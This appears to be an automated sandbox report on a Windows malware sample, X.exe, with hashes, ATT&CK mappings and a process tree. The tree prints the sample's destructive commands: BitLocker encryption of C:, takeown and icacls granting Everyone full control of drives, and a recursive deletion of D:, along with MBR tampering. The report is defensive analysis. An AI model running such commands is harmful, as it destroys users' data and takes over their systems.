ff4af3193eed8df840e40af9e1974e42d99cf2518e3177478a7d59bf373095ef

Analysis

max time kernel
68s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
27-11-2024 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

X.exe
Size

103KB
MD5

d8c74ef17d6366180f58c1334ed40916
SHA1

981a19fca200eb1a0c9e29f8e4c5b10edac929d6
SHA256

ff4af3193eed8df840e40af9e1974e42d99cf2518e3177478a7d59bf373095ef
SHA512

833630d93fc9ca7569b853775f96a745e278dc3501d36485ee6f6ae129bbd9804581980f20e1d722f7e9ee342fe5c2a212a0c9527a474e101e26890009ac56f4
SSDEEP

1536:ceIHqfr3GiWoaXq6ooTtlSYO+mmyZWJGUAg11YqGTFsm0imYFU47o9TKui:ceIHqfrooShLXOLwJ+TOFvYFx7oZs

Score

8^/10

bootkit credential_access discovery exploit persistence stealer upx

Malware Config

Signatures

Possible privilege escalation attempt 4 IoCs

exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid	Process
248	icacls.exe
1212	takeown.exe
564	icacls.exe
2168	takeown.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid	Process
1212	takeown.exe
564	icacls.exe
2168	takeown.exe
248	icacls.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

takeown.exe

description	ioc	Process
File opened (read-only)	\??\D:	takeown.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

Processes:

X.exe

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	X.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/760-0-0x00007FF7AEED0000-0x00007FF7AEF01000-memory.dmp	upx
behavioral1/memory/760-2-0x00007FF7AEED0000-0x00007FF7AEF01000-memory.dmp	upx
behavioral1/memory/760-9-0x00007FF7AEED0000-0x00007FF7AEF01000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

takeown.exe

description	pid	Process
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

X.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 760 wrote to memory of 5588	760	X.exe	80
PID 760 wrote to memory of 5588	760	X.exe	80
PID 760 wrote to memory of 4820	760	X.exe	82
PID 760 wrote to memory of 4820	760	X.exe	82
PID 4820 wrote to memory of 1212	4820	cmd.exe	83
PID 4820 wrote to memory of 1212	4820	cmd.exe	83
PID 760 wrote to memory of 4052	760	X.exe	84
PID 760 wrote to memory of 4052	760	X.exe	84
PID 4052 wrote to memory of 564	4052	cmd.exe	85
PID 4052 wrote to memory of 564	4052	cmd.exe	85
PID 760 wrote to memory of 2592	760	X.exe	86
PID 760 wrote to memory of 2592	760	X.exe	86
PID 760 wrote to memory of 6136	760	X.exe	87
PID 760 wrote to memory of 6136	760	X.exe	87
PID 6136 wrote to memory of 2168	6136	cmd.exe	88
PID 6136 wrote to memory of 2168	6136	cmd.exe	88
PID 760 wrote to memory of 232	760	X.exe	89
PID 760 wrote to memory of 232	760	X.exe	89
PID 232 wrote to memory of 248	232	cmd.exe	90
PID 232 wrote to memory of 248	232	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\X.exe
"C:\Users\Admin\AppData\Local\Temp\X.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:760
- C:\Windows\SYSTEM32\manage-bde.exe
  manage-bde -on C: -EncryptionMethod AES-256
  2⤵
  PID:5588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c takeown /f D:\ /r /d Y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\system32\takeown.exe
    takeown /f D:\ /r /d Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Enumerates connected drives
    PID:1212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls D:\ /grant Everyone:F /t /c /l
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Windows\system32\icacls.exe
    icacls D:\ /grant Everyone:F /t /c /l
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c RD D:\ /S /Q
  2⤵
  PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c takeown /f C:\ /r /d Y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6136
- - C:\Windows\system32\takeown.exe
    takeown /f C:\ /r /d Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\ /grant Everyone:F /t /c /l
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\system32\icacls.exe
    icacls C:\ /grant Everyone:F /t /c /l
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Windows Credential Manager

T1555.004

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/760-0-0x00007FF7AEED0000-0x00007FF7AEF01000-memory.dmp

Filesize
196KB

Download
memory/760-2-0x00007FF7AEED0000-0x00007FF7AEF01000-memory.dmp

Filesize
196KB

Download
memory/760-9-0x00007FF7AEED0000-0x00007FF7AEF01000-memory.dmp

Filesize
196KB

Download